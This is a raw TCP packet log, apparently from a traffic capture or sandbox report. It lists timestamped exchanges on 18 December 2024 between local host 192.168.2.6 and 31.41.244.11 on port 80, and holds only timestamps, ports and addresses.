                                                                                                                                                                  Dec 18, 2024 11:09:47.590293884 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.590672016 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.590734959 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.591228008 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.591335058 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.591976881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.592021942 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.592288017 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.592333078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.592721939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.592767000 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.593476057 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.593815088 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.593874931 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.594695091 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.594796896 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.594850063 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.595735073 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.595838070 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.595870018 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.595926046 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.596379995 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.596504927 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.596565008 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.596695900 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.597604990 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.597665071 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.597773075 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.598011017 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.598592043 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.598665953 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.598725080 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.599504948 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.599559069 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.599610090 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.600514889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.600703955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.600761890 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.601542950 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.601597071 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.601658106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.601713896 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.602813005 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.602868080 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.602879047 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.602927923 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.604202986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.604257107 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.604309082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.605156898 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.605211973 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.605211973 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.605262995 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.606080055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.606139898 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.606201887 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.606249094 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.606950998 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.607006073 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.607043982 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.607090950 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.607899904 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.607954025 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.607955933 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.608000994 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.608853102 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.608906984 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.608957052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.609004974 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.609844923 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.609898090 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.609951019 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.610830069 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.610887051 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.611268044 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.611326933 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.611963987 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.612020969 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.612059116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.612106085 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.612952948 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.613003969 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.613066912 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.613112926 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.613970995 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.614022970 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.614097118 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.614146948 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.614990950 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.615046024 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.615046978 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.615093946 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.615991116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.616041899 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.616120100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.616168976 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.617022038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.617078066 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.617177963 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.617228031 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.618129015 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.618174076 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.618247986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.618295908 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.619095087 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.619144917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.619266987 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.619323969 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.620115995 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.620162964 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.620214939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.620263100 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.621145010 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.621196032 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.621290922 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.621337891 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.622222900 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.622273922 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.622277021 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.622317076 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.623251915 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.623303890 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.623368025 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.623414993 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.624241114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.624291897 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.624445915 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.624495029 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.625258923 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.625308990 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.626215935 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.626267910 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.626343012 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.626378059 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.626390934 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.626431942 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.627351046 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.627402067 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.627487898 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.627536058 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.628353119 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.628401995 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.628803968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.628849030 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.629518032 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.629568100 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.629571915 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.629621983 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.630471945 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.630521059 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.630541086 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.630590916 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.631439924 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.631489038 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.631674051 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.631721973 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.632235050 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.632283926 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.632358074 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.632405043 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.633241892 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.633290052 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.633351088 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.633397102 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.634255886 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.634305000 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.634638071 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.634685993 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.635296106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.635349035 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.773387909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.773407936 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.773473024 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.773802996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.773845911 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.773979902 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.774025917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.774629116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.774672031 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.774820089 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.775084019 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.775681973 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.775726080 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.776011944 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.776052952 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.776757002 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.776869059 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.777522087 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.777693987 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.777714968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.777755976 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.778163910 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.778208017 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.778783083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.778794050 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.778831005 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.779866934 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.779932022 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.780015945 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.780066967 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.781085014 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.781138897 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.781547070 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.781644106 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.782146931 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.782188892 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.782325983 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.782402992 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.782893896 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.782934904 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.783080101 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.783123016 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.783946991 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.784013033 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.784410000 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.784569979 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.785033941 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.785044909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.785073042 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.785089970 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.785681009 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.785887957 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.786209106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.786250114 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.787146091 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.787219048 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.788202047 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.788213015 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.788242102 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.788672924 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.788711071 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.789172888 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.789243937 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.789294958 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.789328098 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.790215969 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.790354013 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.790523052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.790569067 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.791120052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.791131020 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.791169882 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.791297913 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.791338921 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.791476011 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.791523933 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.792283058 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.792325020 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.793039083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.793145895 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.793359995 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.793370962 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.793412924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.794373989 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.794418097 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.794835091 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.794895887 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.795439959 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.795449972 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.795486927 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.796437979 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.797482014 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.797492981 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.797523975 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.798135996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.798496962 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.798507929 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.798542976 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.798561096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.799516916 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.799675941 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.799719095 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.800602913 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.800614119 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.800652981 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.803132057 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.803389072 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.804727077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.804790020 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.804877043 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.804888010 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.804898024 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.804913998 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.804919004 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.804975033 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.805830002 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.805876970 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.805918932 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.805991888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.806615114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.806673050 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.807060003 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.807189941 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.807849884 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.807863951 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.807895899 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.807926893 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.808732986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.808842897 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.808897972 CET804996631.41.244.11192.168.2.6
